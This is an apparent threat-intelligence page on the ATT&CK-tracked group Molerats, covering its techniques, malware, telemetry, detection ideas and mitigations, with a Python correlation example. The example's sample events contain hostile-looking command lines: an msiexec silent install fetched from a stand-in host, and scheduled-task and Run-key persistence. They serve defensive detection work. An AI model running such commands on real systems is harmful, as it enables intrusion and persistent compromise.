G0021: Molerats
Analyst context for executives and security teams
Molerats is an ATT&CK-tracked intrusion set described by MITRE as an Arabic-speaking, politically motivated group operating since 2012, with reported victim geography primarily in the Middle East, Europe, and the United States. For defenders, the value of this object is less about a single signature and more about validating resilience against a recurring pattern: spearphishing-led access, user-assisted execution, Windows backdoors/RATs, persistence through scheduled tasks or Run keys, script execution, tool transfer, and credential theft from browsers.
Executive priority
Treat this as a practical test case for phishing resilience, endpoint visibility, and incident response readiness. Leaders should ask whether the organization can produce evidence that email security, endpoint logging, script controls, persistence monitoring, and credential protection would expose the ATT&CK behaviors associated with this group. Because the official ATT&CK group object has no detection text and no top-level platform list, prioritization should be based on local exposure: geographic relevance, politically sensitive business functions, executive or regional targeting risk, and the presence of Windows-heavy user endpoints where the related malware and techniques are most represented.
Technical view
SOC and IR teams should map coverage against the relationship set rather than relying on a Molerats-specific detection. The relationships include use of PoisonIvy, DustySky, Spark, SharpStage, DropBook, and MoleNet, all listed with Windows platforms, plus techniques spanning spearphishing links and attachments, malicious link/file execution, PowerShell, Visual Basic, JavaScript, msiexec proxy execution, scheduled tasks, Registry Run keys/startup folders, process discovery, ingress tool transfer, deobfuscation/decoding, compression, code signing abuse, and browser credential access. Validate whether detections correlate email events, user execution, child processes from Office/browser/script hosts, persistence writes, scheduled task creation, unusual msiexec activity, downloaded payloads, and browser credential store access into an investigation timeline.
Likely telemetry
- Email security logs for spearphishing attachments and links, including sender, recipient, URL, attachment, and delivery disposition metadata.
- Endpoint process creation telemetry for PowerShell, Visual Basic/JScript script hosts, msiexec.exe, archive/decompression utilities, and suspicious child processes from Office applications or browsers.
- Windows scheduled task creation/modification events and command-line details where available.
- Windows Registry and startup folder monitoring for Run key or startup persistence changes.
- File creation and download telemetry for transferred tools, compressed files, decoded payloads, PyInstaller/.NET artifacts where observable, and signed binaries with unusual context.
Detection direction
- Build behavior-led analytics around the ATT&CK relationships rather than a single group label; the official object does not provide detection guidance.
- Tune phishing detections to connect initial email delivery with endpoint execution from attachments or links, especially when followed by script interpreters, msiexec, downloads, or persistence creation.
- Validate command-line and parent/child-process visibility for PowerShell, Visual Basic/JScript, msiexec.exe, and archive/decode activity; lack of command-line logging is a material blind spot.
- Monitor scheduled task and Run key creation in user context, but account for legitimate software installers and administrative tools to reduce false positives.
- Review code-signing trust logic: a signed binary should not be treated as benign without execution context, source path, signer reputation, and behavior.
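One way to turn the detection direction above into correlation logic, as an added example that is not part of this page or of MITRE's material: the event shape, field names and sample events are assumptions modelled loosely on endpoint process/registry telemetry, while the technique IDs are the ones in this page's "Techniques used" table.

```python
# Added example (not page/MITRE code): correlate constructed endpoint events into an
# ATT&CK-tagged timeline. Technique IDs are from this page's "Techniques used" table;
# the event shape, field names and sample values are assumptions for this example.
SCRIPT_HOSTS = {"powershell.exe": "T1059.001", "wscript.exe": "T1059.005",
                "cscript.exe": "T1059.005"}
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
RUN_KEY = "\\currentversion\\run\\"  # lower-cased substring of a Run key path

def _name(path):
    """Lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def tag_event(e):
    """Map one event to (ts, host, technique, detail) tuples for page-listed techniques."""
    img, parent, cmd = _name(e.get("image", "")), _name(e.get("parent_image", "")), e.get("cmd", "")
    hit = lambda tid, detail: (e["ts"], e["host"], tid, detail)
    out = []
    if e["type"] == "process":
        # User-assisted execution: Office/browser parent spawning a script host or msiexec.
        if parent in USER_APPS and (img in SCRIPT_HOSTS or img == "msiexec.exe"):
            out.append(hit("T1204.002", f"{parent} spawned {img}"))
        if img in SCRIPT_HOSTS:
            out.append(hit(SCRIPT_HOSTS[img], cmd))
        if img == "msiexec.exe" and "http" in cmd.lower():  # MSI fetched from a URL
            out.append(hit("T1218.007", cmd))
        if img == "schtasks.exe" and "/create" in cmd.lower():
            out.append(hit("T1053.005", cmd))
    elif e["type"] == "registry" and RUN_KEY in e["key"].lower():
        out.append(hit("T1547.001", f'{e["key"]} = {e["value"]}'))
    return out

def build_timeline(events):
    """Findings ordered by time so IR can read the chain from execution to persistence."""
    return sorted((f for e in events for f in tag_event(e)), key=lambda f: f[0])

# Constructed sample events (not real telemetry): Office-launched VBScript, msiexec
# pulling an MSI from a URL, then scheduled-task and Run-key persistence.
SAMPLE = [
    {"type": "process", "ts": 100, "host": "ws01", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'wscript.exe "C:\Users\u\AppData\Local\Temp\invoice.vbs"'},
    {"type": "process", "ts": 105, "host": "ws01", "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmd": "msiexec.exe /q /i http://example.invalid/update.msi"},
    {"type": "process", "ts": 110, "host": "ws01", "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'schtasks.exe /create /sc minute /mo 10 /tn Updater /tr "wscript.exe C:\Users\u\up.vbs"'},
    {"type": "registry", "ts": 115, "host": "ws01", "value": r"C:\Users\u\up.vbs",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
]
```

Running `build_timeline(SAMPLE)` yields five findings in time order, one per relationship the page lists; in production the same tagging would sit over real EDR events, with the parent/child and command-line fields the page names as a blind spot if missing.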
Mitigation priorities
- Prioritize phishing controls and user-reporting workflows for attachments and links, since both spearphishing attachment and spearphishing link are associated techniques.
- Harden endpoint execution paths: restrict or monitor script interpreters, PowerShell, and msiexec usage according to business need, with emphasis on high-risk users and regions.
- Strengthen persistence prevention and monitoring for scheduled tasks, Registry Run keys, and startup folders on Windows endpoints.
- Reduce credential exposure by managing browser password storage risk, enforcing strong identity controls, and ensuring rapid credential reset procedures during IR.
- Ensure EDR, email, proxy/DNS, and identity logs are retained long enough to reconstruct the sequence from email delivery to execution, persistence, tool transfer, and credential access.
Analyst notes and limits
The ATT&CK object identifies Molerats aliases as Molerats, Operation Molerats, and Gaza Cybergang, and cites reporting from ClearSky, FireEye, Kaspersky, and Cybereason. Relationship context is especially useful here because the group object has no official detection field and no top-level tactics or platforms. The strongest defensible takeaway for defenders is to assess coverage for the related techniques and Windows malware relationships, while keeping geographic and political targeting context as a risk-prioritization input rather than proof of exposure.
This take is limited to the supplied ATT&CK STIX fields, external references, and relationships. It does not assert current activity, customer targeting, confirmed compromise, or guaranteed detection. Top-level platforms and tactics are not specified for the intrusion-set object; platform references come only from related software and technique objects. Local environment telemetry, asset exposure, business geography, and control configuration are required to determine actual risk and coverage.
Molerats
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1218.007 | Msiexec Sub-technique | Molerats has used msiexec.exe to execute an MSI payload. (Citation: Unit42 Molerat Mar 2020) |
| Enterprise | T1204.001 | Malicious Link Sub-technique | |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1553.002 | Code Signing Sub-technique | |
| Enterprise | T1027.015 | Compression Sub-technique | |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Molerats has created scheduled tasks to persistently run VBScripts. (Citation: Unit42 Molerat Mar 2020) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | |
| Enterprise | T1057 | Process Discovery | |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1059.001 | PowerShell Sub-technique | |
| Enterprise | T1059.005 | Visual Basic Sub-technique | |
| Enterprise | T1059.007 | JavaScript Sub-technique | |
| Enterprise | T1204.002 | Malicious File Sub-technique | |
Groups, software, and campaigns
S0553: MoleNet
S0543: Spark
S0062: DustySky
S0547: DropBook
S0546: SharpStage
SharpStage is a .NET malware with backdoor capabilities.[1][2]
S0012: PoisonIvy
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 2.1 | | Current bundle | 096dac19e8b2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] DustySky: ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.
[2] DustySky2: ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.
[3] Kaspersky MoleRATs April 2019: GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.
[4] Cybereason Molerats Dec 2020: Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.
[5] FireEye Operation Molerats: Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved November 17, 2024.
[6] Gaza Cybergang (alias): (Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)
[7] Molerats (alias): (Citation: DustySky)
[8] Operation Molerats (alias): (Citation: FireEye Operation Molerats)(Citation: Cybereason Molerats Dec 2020)
[9] mitre-attack: G0021
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.